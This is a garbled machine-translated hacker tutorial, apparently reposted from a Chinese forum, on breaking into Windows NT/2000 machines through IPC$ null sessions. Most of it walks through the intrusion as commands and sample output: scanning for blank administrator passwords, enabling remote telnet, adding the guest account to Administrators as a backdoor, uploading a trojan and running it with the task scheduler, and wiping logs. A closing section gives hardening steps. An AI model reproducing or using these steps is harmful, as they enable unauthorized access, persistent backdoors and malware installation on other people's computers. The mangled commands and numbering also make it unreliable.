Use IPC $ null connection
Directory:
Preface
2. What is IPC $
3. What is an empty session?
What can a four-Null Session do?
Five IPC $ port used for connection
Significance of six IPC $ connection in hack attacks
Seven IPC $ common causes of connection failure
8. Reasons for file copy failure
9. How to enable the target IPC $ sharing and other sharing?
Eleven commands that require Shell
Commands that may be used during intrusion
12 IPC $ complete intrusion steps
Thirteen how to prevent IPC $ intrusion
Fourteen IPC $ featured intrusion Q &
If the 15th day is over
Preface
There are many articles about IPC $ intrusion on the Internet, and there is no lack of excellent work. Attack steps can even be said to have become a classic model, therefore, no one is willing to take things that have become a theory and play around with them.
However, I personally think these articles are not detailed. For cainiao who first came into contact with IPC $, the Simple listing steps do not solve their various puzzles (you can search for IPC $ in an hack forum to see how many doubts exist ). Therefore, I have written this summary article based on some online materials, tutorials, and Forum posts, and want to clarify some confusing and confusing questions, let everyone stay here!
Note: All the situations discussed in this article occur in the Windows NT/2000 environment by default. Win98 is not included in this discussion. In view of Windows XP's improved security settings, some operations are not applicable and will be discussed separately.
2. What is IPC $
IPC $ (Internet process connection) is a resource that shares "named pipes". It is a named pipe open for inter-process communication. By providing a trusted user name and password, both parties can establish a secure channel and exchange encrypted data through this channel to access remote computers. IPC $ is a new feature of NT/2000. It has a feature that only one connection can be established between two IP addresses at the same time. NT/2000 provides the IPC $ function and enables default sharing when installing the system for the first time, that is, all logical sharing (C $, d $, e $ ......) Shared with the system directory winnt or Windows (ADMIN $. All of these, Microsoft's original intention is to facilitate administrator management, but intentionally or unintentionally, leading to a reduction in system security.
We often hear people talking about the IPC $ vulnerability and IPC $ vulnerability. In fact, IPC $ is not a real vulnerability, it must be the 'webshell 'placed by Microsoft itself: Null Session ). So what is an empty session?
3. What is an empty session?
Before introducing null sessions, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which both parties can communicate information, the general sequence of this process is as follows:
1) The session requestor (customer) sends a packet to the session receiver (server), requesting the creation of the Security Tunnel
Li;
2) The server generates a random 64-digit number (implementing the Challenge) and transmits it back to the customer;
3) The customer obtains the 64-digit number generated by the server and disconnects it with the password of the account trying to establish the session.
If it is returned to the server (implementing the response );
4) The server receives the response and sends it to the local security authentication (LSA). lsa verifies the response by using the correct password of the user to confirm the identity of the requester. If the requester's account is the local account of the server, verify that the local account has occurred. If the requested account is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then transmitted to the customer. The customer uses this access token to connect to the resources on the server until the suggested session is terminated.
The above is the general process of establishing a secure session. What about empty sessions?
Empty sessions are Sessions established with the server without trust (that is, no user name or password is provided), but according to the Win2000 access control model, A token is also required to establish a null session. However, a null session is not authenticated by user information during creation. Therefore, this token does not contain user information, this session cannot send encrypted information between systems, but it does not indicate that the token of the empty session does not contain the Security Identifier Sid (which identifies the user and the group). For an empty session, the SID of the token provided by LSA is the S-1-5-7, which is the SID of the empty Session, the username is: Anonymous Logon (This username is visible in the user list, but it cannot be found in the SAM Database and belongs to the system's built-in account). This access token contains the following disguised group:
Everyone
Network
Under Security policy restrictions, this empty session will be authorized to access all the information authorized to access the above two groups. So what can an empty session be created?
What can a four-Null Session do?
For nt, with the default security settings, you can use a null connection to list users and shares on the target host, share the everyone permission, and access a small portion of the Registry, there is no significant value for use; it is less useful for 2000, because in Windows 2000 and later versions, Only Administrators and Backup Operators have the right to access the registry from the network by default, and it is not convenient to implement it, tools are required. From this we can see that this untrusted session is not very useful, but from a complete IPC $ intrusion, empty sessions are an indispensable stepping stone, because we can get a list of users from it, this is enough for a sophisticated hacker. The following are specific commands that can be used in an empty session:
1. First, create an empty session (the target is required to open IPC $)
Command: net use \ IP \ IPC $ ""/User :""
Note: The preceding command contains four spaces. There is a space between net and use, one after use, and one between the left and right sides of the password.
2. view the shared resources of the remote host
Command: Net view \ IP
Explanation: After an empty connection is established, you can use this command to view the shared resources of the remote host. If sharing is enabled, the following similar results can be obtained:
Share resources in \ *. *
Resource Sharing name type usage comment
-----------------------------------------------------------
Netlogon disk Logon Server share
Sysvol disk Logon Server share
The command is successfully completed.
3. view the current time of the remote host
Command: Net time \ IP
Explanation: You can use this command to obtain the current time of a remote host.
4. Obtain the NetBIOS username list of the remote host (you need to enable your NBT)
NBTSTAT-A IP
Run this command to obtain the NetBIOS username list of the remote host (your NetBIOS support is required). The following result is returned:
Node IPaddress: [*. *] scope ID: []
NetBIOS remote machine name table
Name type status
---------------------------------------------
Server <00> unique registered
OYAMANISHI-H <00> group registered
OYAMANISHI-H <1C> group registered
Server <20> unique registered
OYAMANISHI-H <1B> unique registered
OYAMANISHI-H <1E> group registered
Server <03> unique registered
OYAMANISHI-H <1D> unique registered
. _ Msbrowse _. <01> group registered
Inet ~ Services <1C> group registered
Is ~ Server... <00> unique registered
MAC address = 00-50-8b-9a-2d-37
The above is what we often use empty sessions to do. It seems that we can also get a lot of things, but note that the operations for establishing an IPC $ connection will leave a record in EventLog, whether or not you have successfully logged on. Well, let's take a look at the port used by IPC $?
Five IPC $ port used
First, let's take a look at some basic knowledge:
1 SMB: (Server Message Block) Windows protocol family, used for file printing and sharing services;
2 NBT: (NetBIOS over TCP/IP) use the 137 (UDP) 138 (UDP) 139 (TCP) port to implement NetBIOS network interconnection based on the TCP/IP protocol.
3. In WindowsNT, SMB is implemented based on NBT. in Windows2000, SMB is implemented based on NBT and port 445.
With these basic knowledge, we can further discuss the port selection for access network sharing:
For the Win2000 client:
1. If NBT is allowed to connect to the server, the client tries to access ports 139 and 445 at the same time. If port 445 has a response, the client sends an RST packet to port 139 to disconnect, when port 455 is used for a session, port 445 is used only when port 139 does not respond. If neither port responds, the session fails;
2. If NBT is prohibited from connecting to the server, the client only attempts to access port 445. If port 445 does not respond, the session fails. It can be seen that the sharing access to Win NT by Win 2000 after NBT is disabled will fail.
For the Win2000 Server:
1 If NBT is allowed, UDP port 137,138 and TCP port 139,445 will be open;
2. If NBT is disabled, only port 445 is enabled.
Our IPC $ session port selection also complies with the above principles. Obviously, if the remote server does not listen to port 139 or port 445, the IPC $ session cannot be established.
Significance of six IPC $ connection in hack attacks
As mentioned above, even if you establish an empty connection, you can obtain a lot of information (which is often necessary for intrusion ), if you can log in as a user with certain permissions, you will get the corresponding permissions. Obviously, if you log in as an administrator, hey, you can do whatever you want. However, you should not be happy too early because the Administrator's password is not so good. Although some careless administrators may have weak passwords, This is a minority after all, and now it's no better than the past. As people's security awareness increases, administrators are more and more careful, and it will become increasingly difficult to get the administrator password, therefore, in the future, you may be unable to connect with minimal permissions or even no permissions. Even if the host does not enable IPC $ sharing, you will gradually discover that the IPC $ connection is not omnipotent, so it is unrealistic not to expect that each connection will succeed.
Are you somewhat discouraged? We don't need to use it either. The key is that we should set our mindset right. do not regard IPC $ intrusion as a weapon or think it is invincible. It is just one of many intrusion methods, you may use it to kill and gain nothing. These are normal. In the hacker world, not every road can lead to Rome, but there is always a way to Rome. Please be patient!
Seven IPC $ common causes of connection failure
The following are some common causes of connection failure of IPC $:
1 IPC connection is a special function in Windows NT and above. Because it needs to use many DLL Functions in Windows NT, it cannot be run in Windows 9.x/ me, that is to say, only NT/2000/XP can establish an IPC $ connection to each other, while 98/Me cannot establish an IPC $ connection;
2 If you want to successfully establish an IPC $ connection, you need to enable IPC $ sharing for the other party, even if it is a null connection. If the other party disables IPC $ sharing, you will fail to establish the connection;
3. You have not started the lanmanworkstation service. It provides network link and communication. Without it, you cannot initiate a connection request (display name: workstation );
4. The peer has not started the LanmanServer service. It provides RPC support, file, printing, and named pipe sharing. IPC $ depends on this service, the remote host without it will not be able to respond to your connection request (display name: Server );
5. The peer does not start netlogon. netlogon supports the pass-through account logon identity on the network;
6. The other party prohibits NBT (that is, port 139 is not enabled );
7. The peer firewall shields ports 139 and 445;
8. Your username or password is incorrect (it is clear that the session is empty to exclude this error );
9 command input error: there may be more or less space. When the user name and password do not contain space, double quotation marks on both sides can be omitted. If the password is empty, you can directly enter two quotation marks;
10 if the other party restarts the computer after a connection is established, the IPC $ connection will be automatically disconnected and the connection needs to be established again.
In addition, you can analyze the cause based on the returned error number:
Error 5: Access Denied: the user you are using is probably not the administrator privilege. First, raise the privilege;
Error No. 51. The network path cannot be found in Windows: The network is faulty;
Error No. 53, network path not found: IP address error; target not on; Target LanmanServer service not started; Target firewall (Port filter );
Error No. 67. network name not found: Your lanmanworkstation service is not started or the target has deleted IPC $;
Error 1219: The creden provided conflict with the existing creden set: You have already created an IPC $ with the other party. Please delete and reconnect;
Error Code 1326, unknown user name or wrong password: The cause is obvious;
Error Code 1792: attempted to log on, but the network login service was not started: the target netlogon service was not started;
Error Code 2242: the password of this user has expired: The target has an account policy, and the password must be changed periodically.
8. Reasons for file copy failure
Some of my friends have successfully established an IPC $ connection, but they have encountered such a problem during copy and cannot be copied successfully. What are the common causes of replication failure?
1. Blind Replication
This type of error occurs most, accounting for more than 50%. Many friends even do not know whether the other party has shared folders, so they perform blind replication. As a result, the replication fails and is very depressing. Therefore, we recommend that you use the net view \ ip command to check the sharing information of the other party before copying. Do not think that shared folders are always available when the IPC $ connection is established successfully.
2 default sharing Error
This type of errors is also common and involves two major aspects:
1) if the default share is enabled for the host that can establish the IPC $ connection, the default share file will be shared to ADMIN $ immediately after the connection is established, leading to a copy failure. The successful connection of IPC $ indicates that the Peer has enabled IPC $ sharing. The sharing of IPC $ is the same as the default sharing. The sharing of IPC $ is a named pipe and is not an actual folder, by default, sharing is not a necessary condition for IPC $ sharing;
2) because the net view \ IP cannot display the default share (because the default share with $), we cannot determine whether the default share is enabled by the other Party through this command, therefore, if the default share is not enabled, all operations performed on the default share cannot be successful. (However, most scanning software can scan the default share directory while weak passwords are being scanned, can avoid such errors)
3. Insufficient user permissions, including:
1) When an empty connection is replicated to all shares (default share and normal share), permissions are insufficient in most cases;
2) The Administrator must have the permission to share the copy with default;
3) When copying data to a common shared object, you must have the corresponding permissions (that is, the access permissions set by the other party in advance );
4) the other party can prohibit external access sharing through firewall or security software settings;
Note that the Administrator name cannot be changed.
4 killed by the firewall or on the LAN
Maybe your copy operation has been successful, but when the remote operation is running, it is killed by the firewall, leading to the failure to find the file; or you may copy the Trojan horse to the host in the LAN, leading to connection failure. Therefore, we recommend that you be careful when copying data. Otherwise, you will be able to discard all your efforts.
As you know, the IPC $ connection may have a strange problem during actual operations. What I have summarized above is some common errors that I did not mention, you can only understand it for yourself.
9. How to enable the target IPC $ sharing and other sharing?
The target IPC $ cannot be opened easily, otherwise the world will be disrupted. You need a shell with admin permissions, such as telnet and Trojan horse, and then execute net share IPC $ in shell to open the target IPC $, use Net share IPC $/del to disable sharing. If you want to open a shared folder for it, you can use net share baby = c: \ to open its drive C as the shared name baby share.
Eleven commands that require Shell
I can see that many tutorials are not accurate in this aspect. Some commands that require shell to complete are simply executed under the IPC $ connection, which is misleading. Next I will summarize the commands that need to be completed in shell:
1. Create a user to the remote host, activate the user, and modify the user password. The operations to join the management group must be completed in shell;
2. Enable IPC $ sharing for the remote host, which is shared by default. Common sharing operations must be completed in shell;
3. Run or close the remote host service in shell;
4. The process of starting/killing the remote host also needs to be completed in shell.
Commands that may be used during intrusion
Note that the command is applicable to local or remote hosts. If the command is applicable to local hosts, you can only execute the command to the remote host after obtaining the shell of the remote host.
1. Create an empty connection:
Net use \ IP \ IPC $ ""/User :""
2. Create a non-empty connection:
Net use \ IP \ IPC $ "psw"/User: "Account"
3. view the shared resources of the remote host (but cannot see the default share)
Net view \ IP
4. view the shared resources of the local host (the local default share is displayed)
NET Share
5. Obtain the username list of the remote host.
NBTSTAT-A IP
6. Obtain the user list of the local host.
Net user
7. view the current time of the remote host
Net time \ IP
8. display the current service of the local host
Net start
9 start/Close local services
Net start service name/y
Net stop service name/y
10 ing Remote sharing:
Net use Z: \ IP \ baby
This command maps the shared resource named baby to the Z disk.
11 delete a shared ing
Net use C:/del Delete the mapped C disk, and other disks.
Net use */del/y delete all
12. Copy files to the remote host
Copy \ path \ srv.exe \ IP \ shared directory name, for example:
Copy ccbirds.exe \ *. * \ c: copy the files in the current directory to the drive C.
13 Add a scheduled task remotely
At \ IP time program name, for example:
At \ 127.0.0.0 :00 love.exe
Note: The time should be in the 24-hour format. You do not need to add a path in the system's default search path (such as system32/); otherwise, you must add a full path.
14 Enable telnet for the remote host
Here we need to use a small program: opentelnet.exe, which is available on all major download sites and must meet four requirements:
1) IPC $ sharing is enabled for the target.
2) You must have an administrator password and an account.
3) The RemoteRegistry service is enabled for the target user and the NTLM authentication is required.
4) valid for Win2k/XP, NT not tested
Command Format: opentelnet.exe \ Server account psw NTLM authentication Port
Example: C: \> opentelnet.exe \ *. * administrator "" 1 90
15 activate a user/join the Administrator Group
1 Net uesr account/active: Yes
2 Net localgroup Administrators account/Add
16 disable Telnet on the remote host
You also need a small program: resumetelnet.exe
Command Format: resumetelnet.exe \ Server account psw
Example: C: \> resumetelnet.exe \ *. * administrator ""
17. delete an established IPC $ connection.
Net use \ IP \ IPC $/del
(This tutorial is occasionally updated, to get the latest version, please log on to the official website: caicainiao Community original http://ccbirds.yeah.net)
12 IPC $ complete intrusion steps
In fact, the intrusion steps vary with personal interests. Let's talk about the common steps!
1. Use the scanning software to search for hosts with passwords, such as streamer, SSS, and X-scan. Follow your instructions and lock the target. If you have scanned the administrator password, you can perform the following steps. Assume that the administrator password is blank.
2. You can select either telnet (command line) or Trojan (graphic interface) for the peer. Let's telnet this path first.
3. Do not forget the Telnet command above. Use the opentelnet applet.
C: \> opentelnet.exe \ 192.168.21. * administrator "" 1 90
If the following information is returned:
**************************************** ***************
Remote telnet configure, by refdom
Email: [email protected]
Opentelnet.exe
Usage: opentelnet.exe \ Server Username Password ntlmauthor telnetport
**************************************** ***************
Connecting \ 192.168.21. *... successfully!
Notice !!!!!!
The Telnet service default setting: ntlmauthor = 2 telnetport = 23
Starting Telnet service...
Telnet service is started successfully! Telnet service is running!
Bingle !!! Yeah !!
Telnet port is 90. You can try: "Telnet IP 90", to connect the server!
Disconnecting server... successfully!
* It indicates that you have enabled telnet on port 90.
4. Telnet now
Telnet 192.168.21.*90
If it succeeds, you will get a shell from the remote host. At this time, you can control your bots like your own machines. What should you do? Activate guest and add it to the Management Group. Even if there is a backdoor
5 c: \> net user guest/active: Yes
* Activating a guest user may also enable a user's guest. You can use net user guest to check whether its account is enabled with yes or no.
6 c: \> net user guest 1234
* Change the password of guest to 1234, or change it to your preferred password.
7 c: \> net localgroup administrators guest/Add
* Change guest to administrator. In this way, even if the administrator changes his password in the future, we can log on with guest. However, we also need to remind you that because of the security policy settings, remote access to accounts such as guest can be prohibited. If this is the case, our backdoors will be white. May God bless guest.
8. Now let's take another path and upload a trojan for fun.
9 first, establish an IPC $ connection.
C: \> net use \ 192.168.21. * \ IPC $ "/User: Administrator
10 if you want to upload something, you must first know what sharing it has.
C: \> net view \ 192.168.21 .*
Share resources in \ 192.168.21. *
Resource Sharing name type usage comment
-----------------------------------------------------------
C Disk
D Disk
The command is successfully completed.
* Well, we can see that the other party has shared the C and D disks. Now we can copy files to any disk. Again, because the default share cannot be seen using the net view command, we cannot determine whether the default share is enabled by the other Party through the result returned above.
11 c: \> copy love.exe \ 192.168.21. * \ c
1 file copied
* With this command, you can upload the trojan client love.exe to the drive C of the other party. Of course, it is best to copy the client to the system folder and it is not easy to find out.
12 before running a Trojan, let's take a look at its current time
Net time \ 192.168.21 .*
\ 192.168.21. * The current time is
Command completed successfully
13 now we can run it at, but the other party must activate the Task Scheduler Service (allowing the program to run at the specified time); otherwise, it will not work.
C: \> at \ 192.168.21. * 11: 02 c: \ love.exe
A new job is added. Its job ID is 1.
14 The rest is waiting. After, you can use the control terminal to connect. If the connection succeeds, you can use the graphical interface to control the remote host. If the connection fails, then it may be in the LAN, or the program may be killed by the firewall, or it may be offline (not so clever). In either case, you have to give up.
Well, let's talk about both basic methods. If you are familiar with the above operations, you can also use more efficient routines, such as using Ca to clone guest, using mongoxec to execute Trojans, and using the command: export xec \ tergetip-u user-P paswd cmd.exe to directly obtain the shell and so on. You can use Alibaba's elsave.exe.
Once we talk about the intrusion of IPC $, we can't say how to prevent it. What should we do? See the following:
Thirteen how to prevent IPC $ intrusion
1. Disable NULL connections for enumeration (this operation cannot prevent NULL connections from being established)
Method 1:
Run regedit and find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA] to change the key value of restrictanonymous = DWORD to: 1
If it is set to "1", an anonymous user can still connect to IPC $ share, but the information such as Sam account and share can be listed through this connection; "2" is added in Windows 2000 to restrict all anonymous access unless otherwise authorized. If it is set to 2, some other problems may occur. We recommend that you set it to 1. If the preceding primary key does not exist, create a new one and change the key value.
Method 2:
Choose "Local Security Settings"> "Local Policy"> "Security Options"> "additional restrictions on anonymous connections ".
2. Disable default sharing
1) view local shared resources
Run-cmd-enter net share
2) delete a shared object (the shared object still exists by default after it is restarted)
NET Share IPC $/delete
NET Share ADMIN $/delete
NET Share C $/delete
NET Share d $/delete (if E, F ,...... Can continue to delete)
3) Stop the Server Service
Net stop server/Y (the server service will be restarted after the restart)
4) Disable auto enable default share (IPC $ share is not disabled in this operation)
Run-Regedit
Server: Find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters] and change the key value of AutoShareServer (DWORD) to 00000000.
Pro: Find the following primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters] and change the key value of autoscaling wks (DWORD) to 00000000.
If the preceding primary key does not exist, a new primary key (right-click-New-double byte value) is created and the key value is changed.
By default, these two key values do not exist on the host. You must manually add them.
3. Disable IPC $ and the default shared dependency service: Server service.
Control Panel-Administrative Tools-service-find Server Service (right-click)-properties-General-start type-select Disabled
At this time, there may be a message saying: the xxx service will also shut down and whether to continue, because some secondary services depend on the LanmanServer, so don't worry about it.
4. Mask port 139,445
Without the support of the above two ports, you cannot establish IPC $. Therefore, blocking port 139,445 can also prevent IPC $ intrusion.
1) port 139 can be blocked by disabling NBT
Local Connection-TCP/It properties-advanced-wins-select 'Disable Netbios on TCP/It'
2) port 445 can be blocked by modifying the Registry
Add a key value
Hive: HKEY_LOCAL_MACHINE
Key: System \ ControlSet \ Services \ netbt \ Parameters
Name: smbdeviceenabled
Type: REG_DWORD
Value: 0
Restart the machine after modification.
Note: If the two ports are blocked, you cannot use IPC $ to intrude into others.
3) install a firewall to filter ports
5. Set a complex password to prevent password enumeration through IPC $.
IPC $ null connection (reprinted)